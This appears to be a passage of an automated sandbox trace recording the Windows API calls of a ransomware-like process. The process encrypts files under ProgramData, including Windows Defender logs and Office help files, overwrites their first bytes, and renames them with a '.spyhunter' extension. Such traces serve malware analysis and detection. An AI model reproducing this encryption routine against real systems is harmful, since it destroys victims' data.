SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.388] WriteFile (in: hFile=0x170, lpBuffer=0x248f78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f74c, lpOverlapped=0x0 | out: lpBuffer=0x248f78c*, lpNumberOfBytesWritten=0x248f74c*=0x4, lpOverlapped=0x0) returned 1 [0129.552] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f74c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f74c*=0x30, lpOverlapped=0x0) returned 1 [0129.553] CloseHandle (hObject=0x170) returned 1 [0129.557] GetProcessHeap () returned 0x2c0000 [0129.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.557] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.spyhunter") returned 81 [0129.557] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll.spyhunter")) returned 1 [0129.558] GetProcessHeap () returned 0x2c0000 [0129.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05c68 | out: hHeap=0x2c0000) returned 1 [0129.558] GetProcessHeap () returned 0x2c0000 [0129.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.558] GetProcessHeap () returned 0x2c0000 [0129.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80898 | out: hHeap=0x2c0000) returned 1 [0129.569] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f780 | out: pbBuffer=0x248f780) returned 1 [0129.569] GetProcessHeap () returned 0x2c0000 [0129.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.571] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f778*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f778*=0x30) returned 1 [0129.571] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0129.572] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log") returned 79 [0129.572] StrStrW (lpFirst="MPLog-07132009-221054.log", lpSrch=".txt") returned 0x0 [0129.572] GetProcessHeap () returned 0x2c0000 [0129.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0129.573] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f73c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f73c*=0x2800, lpOverlapped=0x0) returned 1 [0129.649] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.649] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f73c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f73c*=0x2800, lpOverlapped=0x0) returned 1 [0129.649] GetProcessHeap () returned 0x2c0000 [0129.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0129.649] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.649] WriteFile (in: hFile=0x158, lpBuffer=0x248f77c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f73c, lpOverlapped=0x0 | out: lpBuffer=0x248f77c*, lpNumberOfBytesWritten=0x248f73c*=0x4, lpOverlapped=0x0) returned 1 [0129.650] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f73c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f73c*=0x30, lpOverlapped=0x0) returned 1 [0129.650] CloseHandle (hObject=0x158) returned 1 [0129.650] GetProcessHeap () returned 0x2c0000 [0129.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0129.651] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.spyhunter") returned 89 [0129.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-221054.log.spyhunter" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-221054.log.spyhunter")) returned 1 [0129.651] GetProcessHeap () returned 0x2c0000 [0129.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0129.651] GetProcessHeap () returned 0x2c0000 [0129.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.652] GetProcessHeap () returned 0x2c0000 [0129.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e738 | out: hHeap=0x2c0000) returned 1 [0129.652] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f778 | out: pbBuffer=0x248f778) returned 1 [0129.652] GetProcessHeap () returned 0x2c0000 [0129.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.652] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f770*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f770*=0x30) returned 1 [0129.652] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0129.653] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log") returned 79 [0129.653] StrStrW (lpFirst="History.Log", lpSrch=".txt") returned 0x0 [0129.653] GetProcessHeap () returned 0x2c0000 [0129.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0129.653] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f734, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f734*=0x2, lpOverlapped=0x0) returned 1 [0129.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffffe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.654] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x248f734, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f734*=0x2, lpOverlapped=0x0) returned 1 [0129.654] GetProcessHeap () returned 0x2c0000 [0129.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0129.654] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.654] WriteFile (in: hFile=0x158, lpBuffer=0x248f774*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f734, lpOverlapped=0x0 | out: lpBuffer=0x248f774*, lpNumberOfBytesWritten=0x248f734*=0x4, lpOverlapped=0x0) returned 1 [0129.654] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f734, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f734*=0x30, lpOverlapped=0x0) returned 1 [0129.654] CloseHandle (hObject=0x158) returned 1 [0129.654] GetProcessHeap () returned 0x2c0000 [0129.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0129.654] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.spyhunter") returned 89 [0129.655] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.spyhunter" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\history.log.spyhunter")) returned 1 [0129.657] GetProcessHeap () returned 0x2c0000 [0129.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0129.657] GetProcessHeap () returned 0x2c0000 [0129.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.657] GetProcessHeap () returned 0x2c0000 [0129.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef9a0 | out: hHeap=0x2c0000) returned 1 [0129.657] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f778 | out: pbBuffer=0x248f778) returned 1 [0129.657] GetProcessHeap () returned 0x2c0000 [0129.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.658] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f770*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f770*=0x30) returned 1 [0129.658] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0129.658] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}") returned 115 [0129.658] StrStrW (lpFirst="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpSrch=".txt") returned 0x0 [0129.658] GetProcessHeap () returned 0x2c0000 [0129.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0129.658] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f734, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f734*=0x1a60, lpOverlapped=0x0) returned 1 [0129.659] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe5a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.660] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1a60, lpNumberOfBytesWritten=0x248f734, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f734*=0x1a60, lpOverlapped=0x0) returned 1 [0129.660] GetProcessHeap () returned 0x2c0000 [0129.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0129.660] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.660] WriteFile (in: hFile=0x158, lpBuffer=0x248f774*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f734, lpOverlapped=0x0 | out: lpBuffer=0x248f774*, lpNumberOfBytesWritten=0x248f734*=0x4, lpOverlapped=0x0) returned 1 [0129.660] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f734, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f734*=0x30, lpOverlapped=0x0) returned 1 [0129.660] CloseHandle (hObject=0x158) returned 1 [0129.660] GetProcessHeap () returned 0x2c0000 [0129.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0129.660] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.spyhunter") returned 125 [0129.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.spyhunter" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}.spyhunter")) returned 1 [0129.661] GetProcessHeap () returned 0x2c0000 [0129.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0129.661] GetProcessHeap () returned 0x2c0000 [0129.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.661] GetProcessHeap () returned 0x2c0000 [0129.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47a90 | out: hHeap=0x2c0000) returned 1 [0129.662] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f770 | out: pbBuffer=0x248f770) returned 1 [0129.662] GetProcessHeap () returned 0x2c0000 [0129.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.662] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f768*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f768*=0x30) returned 1 [0129.662] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0129.663] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin") returned 82 [0129.663] StrStrW (lpFirst="MpSfc.bin", lpSrch=".txt") returned 0x0 [0129.663] GetProcessHeap () returned 0x2c0000 [0129.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0129.663] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f72c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f72c*=0x2800, lpOverlapped=0x0) returned 1 [0129.666] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.666] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f72c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f72c*=0x2800, lpOverlapped=0x0) returned 1 [0129.666] GetProcessHeap () returned 0x2c0000 [0129.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0129.666] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.666] WriteFile (in: hFile=0x158, lpBuffer=0x248f76c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f72c, lpOverlapped=0x0 | out: lpBuffer=0x248f76c*, lpNumberOfBytesWritten=0x248f72c*=0x4, lpOverlapped=0x0) returned 1 [0129.667] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f72c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f72c*=0x30, lpOverlapped=0x0) returned 1 [0129.667] CloseHandle (hObject=0x158) returned 1 [0129.667] GetProcessHeap () returned 0x2c0000 [0129.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0129.668] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.spyhunter") returned 92 [0129.668] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.spyhunter" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin.spyhunter")) returned 1 [0129.668] GetProcessHeap () returned 0x2c0000 [0129.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0129.668] GetProcessHeap () returned 0x2c0000 [0129.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.668] GetProcessHeap () returned 0x2c0000 [0129.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8cfb8 | out: hHeap=0x2c0000) returned 1 [0129.760] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f758 | out: pbBuffer=0x248f758) returned 1 [0129.760] GetProcessHeap () returned 0x2c0000 [0129.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.760] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f750*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f750*=0x30) returned 1 [0129.760] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.884] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned 56 [0129.884] StrStrW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.884] GetProcessHeap () returned 0x2c0000 [0129.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.884] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f714, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f714*=0x152, lpOverlapped=0x0) returned 1 [0129.885] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.885] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x248f714, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f714*=0x152, lpOverlapped=0x0) returned 1 [0129.885] GetProcessHeap () returned 0x2c0000 [0129.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.885] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.885] WriteFile (in: hFile=0x17c, lpBuffer=0x248f754*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f714, lpOverlapped=0x0 | out: lpBuffer=0x248f754*, lpNumberOfBytesWritten=0x248f714*=0x4, lpOverlapped=0x0) returned 1 [0129.885] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f714, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f714*=0x30, lpOverlapped=0x0) returned 1 [0129.885] CloseHandle (hObject=0x17c) returned 1 [0129.885] GetProcessHeap () returned 0x2c0000 [0129.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0129.886] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn.spyhunter") returned 66 [0129.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn.spyhunter")) returned 1 [0129.886] GetProcessHeap () returned 0x2c0000 [0129.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0129.886] GetProcessHeap () returned 0x2c0000 [0129.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0129.886] GetProcessHeap () returned 0x2c0000 [0129.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2d038 | out: hHeap=0x2c0000) returned 1 [0129.887] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f758 | out: pbBuffer=0x248f758) returned 1 [0129.887] GetProcessHeap () returned 0x2c0000 [0129.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0129.887] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248f750*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248f750*=0x30) returned 1 [0129.887] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0129.914] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned 58 [0129.914] StrStrW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".txt") returned 0x0 [0129.914] GetProcessHeap () returned 0x2c0000 [0129.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0129.914] ReadFile (in: hFile=0x158, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f714, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f714*=0x15e, lpOverlapped=0x0) returned 1 [0129.915] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.915] WriteFile (in: hFile=0x158, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x248f714, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f714*=0x15e, lpOverlapped=0x0) returned 1 [0129.915] GetProcessHeap () returned 0x2c0000 [0129.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0129.916] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.916] WriteFile (in: hFile=0x158, lpBuffer=0x248f754*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f714, lpOverlapped=0x0 | out: lpBuffer=0x248f754*, lpNumberOfBytesWritten=0x248f714*=0x4, lpOverlapped=0x0) returned 1 [0129.916] WriteFile (in: hFile=0x158, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f714, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248f714*=0x30, lpOverlapped=0x0) returned 1 [0129.916] CloseHandle (hObject=0x158) returned 1 [0129.916] GetProcessHeap () returned 0x2c0000 [0129.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f05c68 [0129.916] wnsprintfW (in: pszDest=0x2f05c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.spyhunter") returned 68 [0129.916] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.spyhunter" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn.spyhunter")) returned 1 [0129.917] GetProcessHeap () returned 0x2c0000 